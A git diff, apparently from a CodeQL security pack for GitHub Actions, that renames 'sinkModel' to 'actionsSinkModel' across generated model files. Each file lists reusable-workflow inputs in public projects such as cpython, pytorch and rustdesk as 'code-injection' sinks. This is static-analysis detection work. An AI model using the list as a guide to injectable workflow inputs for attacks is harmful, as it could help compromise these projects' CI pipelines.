b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 56823f4e1ac..8345368057c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 0f2937f9d14..3754ebfa63d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index a88c74f8537..3e35747b558 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index b7dfd8fcc9b..a13f6863caa 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 9de8130a93e..af5c300ea8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ea4980b8cd7..449ea8b7b49 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 8787c7e32c9..6656d42c4e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index ea55d53c215..6e7fdc34a54 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index add2fe0d2e2..8fc02a27e1c 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 400cd50b59f..80f19676b4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 42122b5ee22..56b2ef6691e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index c694d3953f6..7bc952a8483 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 9ecf401cab5..1c0663dd01c 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 19fee627702..4da8f327662 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4eb201001e1..4e8adfafe3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 94c7292b655..28cb702ce13 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 6088ffcd702..cb315ee4328 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 05c4dc8ddf3..956c4cba966 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index affc12cdc4a..804c1bdae4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index b1c4d2f2cbf..78d91b2afb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 4ccbd71f8c3..31cadc3ff17 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 2eb2104b542..11362fda1e5 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index fee95860030..131cff3e92a 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 49a98d4dda5..acc5bf51e35 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index aa432107a0d..c89d1c808c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 40053c68c1a..0258c79e83f 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 645ec756783..ebeba1eb226 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5..5f709385839 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe..e96dbba0699 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c..2a7a9afd5a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d16..5094422f3fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f..dff83745645 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3..88b68dc4ea7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830..18c6974c74f 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e15..561c3e15e64 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd7..961741f413f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa..985652a265b 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be17..3103913ab4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e8524..b89c1307d2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8ee..9e60cc61bb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef..cac4e298538 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f..eb2669a96ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89..590e518d350 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145..d55af595b1c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c961..1fd6cd394bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", 